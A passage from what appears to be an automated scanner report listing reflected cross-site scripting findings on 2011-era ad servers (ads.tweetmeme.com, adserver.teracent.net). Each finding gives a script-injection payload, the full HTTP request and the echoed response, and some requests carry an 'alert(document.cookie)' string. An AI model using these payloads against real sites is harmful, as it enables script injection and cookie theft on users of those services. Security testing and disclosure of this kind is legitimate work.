<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TweetMeme Advert
...[SNIP]...
<!-- advert: fallback_728x90a75da--><script>alert(1)</script>e874b2130e -->
...[SNIP]...

4.3. http://ads.tweetmeme.com/serve.js [width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tweetmeme.com
Path:   /serve.js

Issue detail

The value of the width request parameter is copied into an HTML comment. The payload ab33b--><script>alert(1)</script>47c6f06bcd0 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /serve.js?tag=home_leaderboard_iframe&width=728ab33b--><script>alert(1)</script>47c6f06bcd0&height=90&rand=99954773672 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:26:45 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: h02
Content-Length: 8966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TweetMeme Advert
...[SNIP]...
<!-- advert: fallback_728ab33b--><script>alert(1)</script>47c6f06bcd0x90 -->
...[SNIP]...

4.4. http://adserver.teracent.net/tase/ad [AMod parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the AMod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 704ac"-alert(1)-"36514afc716 was submitted in the AMod parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=704ac"-alert(1)-"36514afc716&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929626144_58947126_as2100_imp|285#1295929626144_58947126_as2100_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:06 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:05 GMT
Content-Length: 18380

<!DOCTYPE html>
<!-- Host: as2100 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
salign: "tl",
staticBeaconUrl: "",
staticClickUrl: "http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=704ac"-alert(1)-"36514afc716&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Target
...[SNIP]...

4.5. http://adserver.teracent.net/tase/ad [AMod parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the AMod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a60bb"><script>alert(1)</script>4b5843a51b0 was submitted in the AMod parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=a60bb"><script>alert(1)</script>4b5843a51b0&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929626071_58947124_as2100_imp|285#1295929626071_58947124_as2100_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:06 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:05 GMT
Content-Length: 18525

<!DOCTYPE html>
<!-- Host: as2100 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
<a href="http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=a60bb"><script>alert(1)</script>4b5843a51b0&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Target
...[SNIP]...

4.6. http://adserver.teracent.net/tase/ad [ASeg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the ASeg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc683"-alert(1)-"2dc1b33b334 was submitted in the ASeg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=fc683"-alert(1)-"2dc1b33b334&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929625799_58947114_as2100_imp|285#1295929625799_58947114_as2100_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:05 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:04 GMT
Content-Length: 19370

<!DOCTYPE html>
<!-- Host: as2100 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
salign: "tl",
staticBeaconUrl: "",
staticClickUrl: "http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=fc683"-alert(1)-"2dc1b33b334&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&
...[SNIP]...

4.7. http://adserver.teracent.net/tase/ad [ASeg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the ASeg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90217"><script>alert(1)</script>6ce426e55d3 was submitted in the ASeg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=90217"><script>alert(1)</script>6ce426e55d3&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929625726_58540610_as2106_imp|285#1295929625726_58540610_as2106_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:05 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:05 GMT
Content-Length: 18514

<!DOCTYPE html>
<!-- Host: as2106 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
<a href="http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=90217"><script>alert(1)</script>6ce426e55d3&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&
...[SNIP]...

4.8. http://adserver.teracent.net/tase/ad [AdID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the AdID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b4b"><script>alert(1)</script>7111b958da3 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284f9b4b"><script>alert(1)</script>7111b958da3&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929624833_58477199_as2109_imp|285#1295929624833_58477199_as2109_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:04 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:04 GMT
Content-Length: 18677

<!DOCTYPE html>
<!-- Host: as2109 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
<a href="http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284f9b4b"><script>alert(1)</script>7111b958da3&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297
...[SNIP]...

4.9. http://adserver.teracent.net/tase/ad [AdID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68150"-alert(1)-"af2d3269c19 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=211728468150"-alert(1)-"af2d3269c19&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929624906_58475714_as2110_imp|285#1295929624906_58475714_as2110_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:04 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:04 GMT
Content-Length: 18410

<!DOCTYPE html>
<!-- Host: as2110 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
t/tase",
salign: "tl",
staticBeaconUrl: "",
staticClickUrl: "http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=211728468150"-alert(1)-"af2d3269c19&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297
...[SNIP]...

4.10. http://adserver.teracent.net/tase/ad [FlightID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the FlightID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9a8e"><script>alert(1)</script>c449e67c456 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600e9a8e"><script>alert(1)</script>c449e67c456&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929624056_58540807_as2107_imp|285#1295929624056_58540807_as2107_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:04 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:03 GMT
Content-Length: 18530

<!DOCTYPE html>
<!-- Host: as2107 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
<a href="http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600e9a8e"><script>alert(1)</script>c449e67c456&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,
...[SNIP]...

4.11. http://adserver.teracent.net/tase/ad [FlightID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c10d"-alert(1)-"062e6ccec6 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=8506005c10d"-alert(1)-"062e6ccec6&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929624128_58474466_as2112_imp|285#1295929624128_58474466_as2112_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:04 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:03 GMT
Content-Length: 18422

<!DOCTYPE html>
<!-- Host: as2112 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
dn.tcgmsrv.net/tase",
salign: "tl",
staticBeaconUrl: "",
staticClickUrl: "http://adserving.autotrader.com/event.ng/Type=click&FlightID=8506005c10d"-alert(1)-"062e6ccec6&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,
...[SNIP]...

4.12. http://adserver.teracent.net/tase/ad [RawValues parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the RawValues request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d9ad"-alert(1)-"f428853feb was submitted in the RawValues parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

